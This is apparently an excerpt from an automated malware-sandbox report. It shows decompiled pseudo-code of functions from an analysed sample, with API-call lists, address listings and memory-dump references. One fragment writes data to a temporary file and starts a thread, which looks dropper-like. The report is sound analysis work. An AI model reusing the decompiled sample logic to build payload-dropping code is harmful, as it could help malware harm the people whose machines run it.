                                                                                                                                                                                                                                                                                          								E04007B70( *_v52,  *(_v8 + 0x18),  *(_v8 + 0x1c));
                                                                                                                                                                                                                                                                                          								_t347 = _t347 + 0xc;
                                                                                                                                                                                                                                                                                          								 *(_v52 + 4) =  *(_v8 + 0x1c);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *_v52 = _v36;
                                                                                                                                                                                                                                                                                          							 *(_v52 + 4) = _v44;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if( *_v52 != 0) {
                                                                                                                                                                                                                                                                                          							 *(_v52 + 8) =  *(_v8 + 0xc);
                                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v52 + 0xc)) = _v40;
                                                                                                                                                                                                                                                                                          							_v56 = CreateThread(0, 0, E040077B0, _v52, 0, 0);
                                                                                                                                                                                                                                                                                          							CloseHandle(_v56);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(( *(_v8 + 0xc) & 0x00000004) != 0) {
                                                                                                                                                                                                                                                                                          						E04002510(_v40, 0x400e290);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L22;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}


































                                                                                                                                                                                                                                                                                          0x04006dac
                                                                                                                                                                                                                                                                                          0x04006db3
                                                                                                                                                                                                                                                                                          0x0400723f
                                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                                          0x04007244
                                                                                                                                                                                                                                                                                          0x04006dc9
                                                                                                                                                                                                                                                                                          0x04006dd1
                                                                                                                                                                                                                                                                                          0x04006ddc
                                                                                                                                                                                                                                                                                          0x04006de5
                                                                                                                                                                                                                                                                                          0x04006dee
                                                                                                                                                                                                                                                                                          0x04006df7
                                                                                                                                                                                                                                                                                          0x04006e00
                                                                                                                                                                                                                                                                                          0x04006e09
                                                                                                                                                                                                                                                                                          0x04006e15
                                                                                                                                                                                                                                                                                          0x04007028
                                                                                                                                                                                                                                                                                          0x04007039
                                                                                                                                                                                                                                                                                          0x0400704a
                                                                                                                                                                                                                                                                                          0x0400704f
                                                                                                                                                                                                                                                                                          0x04007077
                                                                                                                                                                                                                                                                                          0x04007099
                                                                                                                                                                                                                                                                                          0x040070a6
                                                                                                                                                                                                                                                                                          0x040070ac
                                                                                                                                                                                                                                                                                          0x040070b6
                                                                                                                                                                                                                                                                                          0x040070c6
                                                                                                                                                                                                                                                                                          0x040070d5
                                                                                                                                                                                                                                                                                          0x040071af
                                                                                                                                                                                                                                                                                          0x040070db
                                                                                                                                                                                                                                                                                          0x040070eb
                                                                                                                                                                                                                                                                                          0x04007107
                                                                                                                                                                                                                                                                                          0x04007114
                                                                                                                                                                                                                                                                                          0x0400713d
                                                                                                                                                                                                                                                                                          0x04007163
                                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                                          0x0400716f
                                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                                          0x04007183
                                                                                                                                                                                                                                                                                          0x04007189
                                                                                                                                                                                                                                                                                          0x040071bc
                                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                                          0x040071e0
                                                                                                                                                                                                                                                                                          0x040071e5
                                                                                                                                                                                                                                                                                          0x040071e8
                                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                                          0x040071fe
                                                                                                                                                                                                                                                                                          0x04007212
                                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                                          0x04007217
                                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                                          0x04007231
                                                                                                                                                                                                                                                                                          0x04007236
                                                                                                                                                                                                                                                                                          0x04007223
                                                                                                                                                                                                                                                                                          0x040071f5
                                                                                                                                                                                                                                                                                          0x040071c9
                                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04007239
                                                                                                                                                                                                                                                                                          0x04006e1b
                                                                                                                                                                                                                                                                                          0x04006e22
                                                                                                                                                                                                                                                                                          0x04006e29
                                                                                                                                                                                                                                                                                          0x04006e39
                                                                                                                                                                                                                                                                                          0x04006eec
                                                                                                                                                                                                                                                                                          0x04006ef1
                                                                                                                                                                                                                                                                                          0x04006ef4
                                                                                                                                                                                                                                                                                          0x04006e3f
                                                                                                                                                                                                                                                                                          0x04006e4f
                                                                                                                                                                                                                                                                                          0x04006e65
                                                                                                                                                                                                                                                                                          0x04006e6c
                                                                                                                                                                                                                                                                                          0x04006e8c
                                                                                                                                                                                                                                                                                          0x04006e92
                                                                                                                                                                                                                                                                                          0x04006e97
                                                                                                                                                                                                                                                                                          0x04006e9a
                                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                                          0x04006ebb
                                                                                                                                                                                                                                                                                          0x04006eca
                                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                                          0x04006ecf
                                                                                                                                                                                                                                                                                          0x04006ea6
                                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                                          0x04006edd
                                                                                                                                                                                                                                                                                          0x04006ee3
                                                                                                                                                                                                                                                                                          0x04006efb
                                                                                                                                                                                                                                                                                          0x04007012
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006f01
                                                                                                                                                                                                                                                                                          0x04006f08
                                                                                                                                                                                                                                                                                          0x04006f1c
                                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                                          0x04006f21
                                                                                                                                                                                                                                                                                          0x04006f2d
                                                                                                                                                                                                                                                                                          0x04006f35
                                                                                                                                                                                                                                                                                          0x04006f3a
                                                                                                                                                                                                                                                                                          0x04006f3d
                                                                                                                                                                                                                                                                                          0x04006f49
                                                                                                                                                                                                                                                                                          0x04006f55
                                                                                                                                                                                                                                                                                          0x04006f83
                                                                                                                                                                                                                                                                                          0x04006f8b
                                                                                                                                                                                                                                                                                          0x04006fa1
                                                                                                                                                                                                                                                                                          0x04006fa6
                                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                                          0x04006fb2
                                                                                                                                                                                                                                                                                          0x04006f57
                                                                                                                                                                                                                                                                                          0x04006f5d
                                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                                          0x04006f65
                                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                                          0x04006fc6
                                                                                                                                                                                                                                                                                          0x04006fcf
                                                                                                                                                                                                                                                                                          0x04006fe9
                                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                                          0x04006ff0
                                                                                                                                                                                                                                                                                          0x04006fbb
                                                                                                                                                                                                                                                                                          0x04006fff
                                                                                                                                                                                                                                                                                          0x0400700a
                                                                                                                                                                                                                                                                                          0x0400700f
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006fff

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04006DC9
                                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04006DD1
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 04006E5F
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000), ref: 04006EB5
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,00000000), ref: 04006EDD
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04006F7A
                                                                                                                                                                                                                                                                                          • CreateThread.KERNEL32 ref: 04006FE3
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 04006FF0
                                                                                                                                                                                                                                                                                          • GetEnvironmentVariableA.KERNEL32(TEMP,?,00000104), ref: 04007028
                                                                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 04007059
                                                                                                                                                                                                                                                                                          • GetTempFileNameA.KERNEL32(?,?,00000000), ref: 04007077
                                                                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 04007093
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04007101
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000,?,?,00000000,?), ref: 0400715D
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04007183
                                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 040071A9
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(000000FF), ref: 040071BC
                                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 04007239
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.730634851.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730592213.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730732791.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.730766607.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4000000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFile$CloseCreateFreeHandleWrite$CountEnvironmentInitializeNameSleepTempThreadTickUninitializeVariable
                                                                                                                                                                                                                                                                                          • String ID: TEMP
                                                                                                                                                                                                                                                                                          • API String ID: 3110491842-1036413054
                                                                                                                                                                                                                                                                                          • Opcode ID: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
                                                                                                                                                                                                                                                                                          • Instruction ID: 2b87ebad86062e1f9aa8347128cf2fe592da7145f1ccd4accac7794ca236a0a8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05801680803462ba2d4cfcd211f126ae5d7fafa0105253d93b0c039220193637
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FF10975A00208EFEB58DF94D984F9DB7B5BB88304F248698E509BB390D775AE81CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 98%
                                                                                                                                                                                                                                                                                          			E001011F0(void* __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v24;
                                                                                                                                                                                                                                                                                          				char _v56;
                                                                                                                                                                                                                                                                                          				intOrPtr _v57;
                                                                                                                                                                                                                                                                                          				intOrPtr _v58;
                                                                                                                                                                                                                                                                                          				intOrPtr _v59;
                                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                                          				intOrPtr _v61;
                                                                                                                                                                                                                                                                                          				intOrPtr _v62;
                                                                                                                                                                                                                                                                                          				intOrPtr _v63;
                                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                                                                                                                          				void _v84;
                                                                                                                                                                                                                                                                                          				struct tagLOGFONTA _v268;
                                                                                                                                                                                                                                                                                          				char _v424;
                                                                                                                                                                                                                                                                                          				void _v428;
                                                                                                                                                                                                                                                                                          				struct _OSVERSIONINFOA _v580;
                                                                                                                                                                                                                                                                                          				void _v584;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v588;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t83;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t88;
                                                                                                                                                                                                                                                                                          				void* _t91;
                                                                                                                                                                                                                                                                                          				signed char _t103;
                                                                                                                                                                                                                                                                                          				int _t114;
                                                                                                                                                                                                                                                                                          				signed char _t115;
                                                                                                                                                                                                                                                                                          				void* _t121;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				void* _t139;
                                                                                                                                                                                                                                                                                          				struct HDC__* _t171;
                                                                                                                                                                                                                                                                                          				int _t172;
                                                                                                                                                                                                                                                                                          				void* _t174;
                                                                                                                                                                                                                                                                                          				signed int _t175;
                                                                                                                                                                                                                                                                                          				void* _t176;
                                                                                                                                                                                                                                                                                          				void* _t177;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t83 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t83 ^ _t175;
                                                                                                                                                                                                                                                                                          				_t174 = __ecx;
                                                                                                                                                                                                                                                                                          				_v428 = 0x154;
                                                                                                                                                                                                                                                                                          				E00106820( &_v424, 0, 0x150);
                                                                                                                                                                                                                                                                                          				_t177 = _t176 + 0xc;
                                                                                                                                                                                                                                                                                          				if(SystemParametersInfoA(0x29, 0x154,  &_v428, 0) == 0) {
                                                                                                                                                                                                                                                                                          					L25:
                                                                                                                                                                                                                                                                                          					_t88 =  *(_t174 + 4);
                                                                                                                                                                                                                                                                                          					_v588 = _t88;
                                                                                                                                                                                                                                                                                          					_t171 = GetWindowDC(_t88);
                                                                                                                                                                                                                                                                                          					_t91 = SelectObject(_t171,  *(_t174 + 0xa4));
                                                                                                                                                                                                                                                                                          					_v24.left = 0;
                                                                                                                                                                                                                                                                                          					_v24.top = 0;
                                                                                                                                                                                                                                                                                          					_v24.right = 0;
                                                                                                                                                                                                                                                                                          					_v24.bottom = 0;
                                                                                                                                                                                                                                                                                          					_t139 = DrawTextA;
                                                                                                                                                                                                                                                                                          					_v584 = _t91;
                                                                                                                                                                                                                                                                                          					DrawTextA(_t171, "\t", 0xffffffff,  &_v24, 0x424);
                                                                                                                                                                                                                                                                                          					if(_v24.right - _v24.left >= 4) {
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0xb0) = 0;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						SetRectEmpty( &_v24);
                                                                                                                                                                                                                                                                                          						DrawTextA(_t171, "x", 0xffffffff,  &_v24, 0x424);
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0xb0) = _v24.right - _v24.left;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					SelectObject(_t171, _v584);
                                                                                                                                                                                                                                                                                          					_v580.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                                                                                                          					E00106820( &(_v580.dwMajorVersion), 0, 0x90);
                                                                                                                                                                                                                                                                                          					GetVersionExA( &_v580);
                                                                                                                                                                                                                                                                                          					if(_v580.dwMajorVersion < 5) {
                                                                                                                                                                                                                                                                                          						L42:
                                                                                                                                                                                                                                                                                          						return E001059E6(ReleaseDC(_v588, _t171), _t139, _v8 ^ _t175, _v588, _t171, _t174);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_v584 = 1;
                                                                                                                                                                                                                                                                                          						if(SystemParametersInfoA(0x100a, 0,  &_v584, 0) == 0 || _v584 != 0) {
                                                                                                                                                                                                                                                                                          							_t103 = 0;
                                                                                                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t103 = 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0x85) = (_t103 & 0x00000001 | 0x00000004) + (_t103 & 0x00000001 | 0x00000004) |  *(_t174 + 0x85) & 0x000000fd;
                                                                                                                                                                                                                                                                                          						E00101600( !(((_t103 & 0x00000001 | 0x00000004) + (_t103 & 0x00000001 | 0x00000004) |  *(_t174 + 0x85) & 0x000000fd) >> 1) & 0x00000001, _t174);
                                                                                                                                                                                                                                                                                          						if(_v580.dwMajorVersion != 5) {
                                                                                                                                                                                                                                                                                          							if(__eflags <= 0) {
                                                                                                                                                                                                                                                                                          								goto L42;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L37;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_v580.dwMinorVersion >= 1) {
                                                                                                                                                                                                                                                                                          								L37:
                                                                                                                                                                                                                                                                                          								_v584 = 0;
                                                                                                                                                                                                                                                                                          								_t114 = SystemParametersInfoA(0x1022, 0,  &_v584, 0);
                                                                                                                                                                                                                                                                                          								__eflags = _t114;
                                                                                                                                                                                                                                                                                          								if(_t114 == 0) {
                                                                                                                                                                                                                                                                                          									L40:
                                                                                                                                                                                                                                                                                          									_t115 = 0;
                                                                                                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                                                                                                          									L41:
                                                                                                                                                                                                                                                                                          									_t79 = _t174 + 0x85;
                                                                                                                                                                                                                                                                                          									 *_t79 =  *(_t174 + 0x85) ^ ( *(_t174 + 0x85) ^ _t115) & 0x00000001;
                                                                                                                                                                                                                                                                                          									__eflags =  *_t79;
                                                                                                                                                                                                                                                                                          									goto L42;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _v584;
                                                                                                                                                                                                                                                                                          								if(_v584 == 0) {
                                                                                                                                                                                                                                                                                          									goto L40;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t115 = 1;
                                                                                                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L42;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_v84 = 0;
                                                                                                                                                                                                                                                                                          				E00106820( &_v80, 0, 0x38);
                                                                                                                                                                                                                                                                                          				_t121 =  *(_t174 + 0xa4);
                                                                                                                                                                                                                                                                                          				_t177 = _t177 + 0xc;
                                                                                                                                                                                                                                                                                          				if(_t121 != 0) {
                                                                                                                                                                                                                                                                                          					GetObjectA(_t121, 0x3c,  &_v84);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				if(_v84 != _v268.lfHeight || _v80 != _v268.lfWidth || _v76 != _v268.lfEscapement || _v72 != _v268.lfOrientation || _v68 != _v268.lfWeight || _v64 != _v268.lfItalic || _v63 != _v268.lfUnderline || _v62 != _v268.lfStrikeOut || _v61 != _v268.lfCharSet || _v60 != _v268.lfOutPrecision || _v59 != _v268.lfClipPrecision || _v58 != _v268.lfQuality || _v57 != _v268.lfPitchAndFamily || lstrcmpA( &_v56,  &(_v268.lfFaceName)) != 0) {
                                                                                                                                                                                                                                                                                          					_t172 = CreateFontIndirectA( &_v268);
                                                                                                                                                                                                                                                                                          					if(_t172 != 0) {
                                                                                                                                                                                                                                                                                          						if( *(_t174 + 0xa4) != 0 && DeleteObject( *(_t174 + 0xa4)) != 0) {
                                                                                                                                                                                                                                                                                          							 *(_t174 + 0xa4) = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t123 =  *(_t174 + 0xa4);
                                                                                                                                                                                                                                                                                          						if(_t123 != 0 && _t123 != _t172) {
                                                                                                                                                                                                                                                                                          							DeleteObject(_t123);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						 *(_t174 + 0xa4) = _t172;
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t174 + 4), 0x30, _t172, 1);
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t174 + 4), 0x41c, 0, "NS");
                                                                                                                                                                                                                                                                                          						SendMessageA( *(_t174 + 4), 0x421, 0, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				goto L25;
                                                                                                                                                                                                                                                                                          			}











































                                                                                                                                                                                                                                                                                          0x001011f9
                                                                                                                                                                                                                                                                                          0x00101200
                                                                                                                                                                                                                                                                                          0x00101215
                                                                                                                                                                                                                                                                                          0x00101217
                                                                                                                                                                                                                                                                                          0x00101221
                                                                                                                                                                                                                                                                                          0x00101226
                                                                                                                                                                                                                                                                                          0x00101240
                                                                                                                                                                                                                                                                                          0x0010139b
                                                                                                                                                                                                                                                                                          0x0010139b
                                                                                                                                                                                                                                                                                          0x0010139f
                                                                                                                                                                                                                                                                                          0x001013ab
                                                                                                                                                                                                                                                                                          0x001013b5
                                                                                                                                                                                                                                                                                          0x001013cb
                                                                                                                                                                                                                                                                                          0x001013ce
                                                                                                                                                                                                                                                                                          0x001013d1
                                                                                                                                                                                                                                                                                          0x001013d4
                                                                                                                                                                                                                                                                                          0x001013d7
                                                                                                                                                                                                                                                                                          0x001013de
                                                                                                                                                                                                                                                                                          0x001013e4
                                                                                                                                                                                                                                                                                          0x001013ef
                                                                                                                                                                                                                                                                                          0x0010141c
                                                                                                                                                                                                                                                                                          0x001013f1
                                                                                                                                                                                                                                                                                          0x001013f5
                                                                                                                                                                                                                                                                                          0x0010140c
                                                                                                                                                                                                                                                                                          0x00101414
                                                                                                                                                                                                                                                                                          0x00101414
                                                                                                                                                                                                                                                                                          0x0010142e
                                                                                                                                                                                                                                                                                          0x00101442
                                                                                                                                                                                                                                                                                          0x0010144c
                                                                                                                                                                                                                                                                                          0x0010145b
                                                                                                                                                                                                                                                                                          0x0010146a
                                                                                                                                                                                                                                                                                          0x00101521
                                                                                                                                                                                                                                                                                          0x0010153f
                                                                                                                                                                                                                                                                                          0x00101470
                                                                                                                                                                                                                                                                                          0x00101480
                                                                                                                                                                                                                                                                                          0x00101492
                                                                                                                                                                                                                                                                                          0x001014a1
                                                                                                                                                                                                                                                                                          0x001014a1
                                                                                                                                                                                                                                                                                          0x0010149d
                                                                                                                                                                                                                                                                                          0x0010149d
                                                                                                                                                                                                                                                                                          0x0010149d
                                                                                                                                                                                                                                                                                          0x001014b4
                                                                                                                                                                                                                                                                                          0x001014c0
                                                                                                                                                                                                                                                                                          0x001014ce
                                                                                                                                                                                                                                                                                          0x001014db
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001014d0
                                                                                                                                                                                                                                                                                          0x001014d7
                                                                                                                                                                                                                                                                                          0x001014dd
                                                                                                                                                                                                                                                                                          0x001014ed
                                                                                                                                                                                                                                                                                          0x001014f7
                                                                                                                                                                                                                                                                                          0x001014fd
                                                                                                                                                                                                                                                                                          0x001014ff
                                                                                                                                                                                                                                                                                          0x0010150e
                                                                                                                                                                                                                                                                                          0x0010150e
                                                                                                                                                                                                                                                                                          0x0010150e
                                                                                                                                                                                                                                                                                          0x00101510
                                                                                                                                                                                                                                                                                          0x0010151b
                                                                                                                                                                                                                                                                                          0x0010151b
                                                                                                                                                                                                                                                                                          0x0010151b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010151b
                                                                                                                                                                                                                                                                                          0x00101501
                                                                                                                                                                                                                                                                                          0x00101508
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010150a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010150a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001014d9
                                                                                                                                                                                                                                                                                          0x001014ce
                                                                                                                                                                                                                                                                                          0x0010146a
                                                                                                                                                                                                                                                                                          0x0010124d
                                                                                                                                                                                                                                                                                          0x00101250
                                                                                                                                                                                                                                                                                          0x00101255
                                                                                                                                                                                                                                                                                          0x0010125b
                                                                                                                                                                                                                                                                                          0x00101260
                                                                                                                                                                                                                                                                                          0x00101269
                                                                                                                                                                                                                                                                                          0x00101269
                                                                                                                                                                                                                                                                                          0x00101278
                                                                                                                                                                                                                                                                                          0x0010132c
                                                                                                                                                                                                                                                                                          0x00101330
                                                                                                                                                                                                                                                                                          0x00101338
                                                                                                                                                                                                                                                                                          0x0010134b
                                                                                                                                                                                                                                                                                          0x0010134b
                                                                                                                                                                                                                                                                                          0x00101351
                                                                                                                                                                                                                                                                                          0x00101359
                                                                                                                                                                                                                                                                                          0x00101360
                                                                                                                                                                                                                                                                                          0x00101360
                                                                                                                                                                                                                                                                                          0x00101369
                                                                                                                                                                                                                                                                                          0x0010137b
                                                                                                                                                                                                                                                                                          0x0010138c
                                                                                                                                                                                                                                                                                          0x00101399
                                                                                                                                                                                                                                                                                          0x00101399
                                                                                                                                                                                                                                                                                          0x00101330
                                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00101221
                                                                                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00000029,00000154,00000154,00000000), ref: 00101238
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00101250
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 00101269
                                                                                                                                                                                                                                                                                          • lstrcmpA.KERNEL32(?,?,?,?,?,?,?,?), ref: 00101315
                                                                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00101326
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00101341
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00101360
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 0010137B
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041C,00000000,00112C34), ref: 0010138C
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000421,00000000,00000000), ref: 00101399
                                                                                                                                                                                                                                                                                          • GetWindowDC.USER32(?,?,?,?), ref: 001013A5
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 001013B5
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00112C38,000000FF,?,00000424), ref: 001013E4
                                                                                                                                                                                                                                                                                          • SetRectEmpty.USER32(?), ref: 001013F5
                                                                                                                                                                                                                                                                                          • DrawTextA.USER32(00000000,00112C3C,000000FF,?,00000424), ref: 0010140C
                                                                                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0010142E
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0010144C
                                                                                                                                                                                                                                                                                          • GetVersionExA.KERNEL32(00000094,?,?,?,?,?,?), ref: 0010145B
                                                                                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(0000100A,00000000,?,00000000), ref: 0010148A
                                                                                                                                                                                                                                                                                          • SystemParametersInfoA.USER32(00001022,00000000,00000001,00000000), ref: 001014F7
                                                                                                                                                                                                                                                                                          • ReleaseDC.USER32 ref: 00101529
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Object$InfoMessageParametersSendSystem_memset$DeleteDrawSelectText$CreateEmptyFontIndirectRectReleaseVersionWindowlstrcmp
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3152644950-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 86e148b133b59b96048caeecde11733302bddb6ec3e6be266adfd6776523adf3
                                                                                                                                                                                                                                                                                          • Instruction ID: 8234cd239013465be8611f72f8f56ac40998e51b966dc9c8e64ca292fe187df6
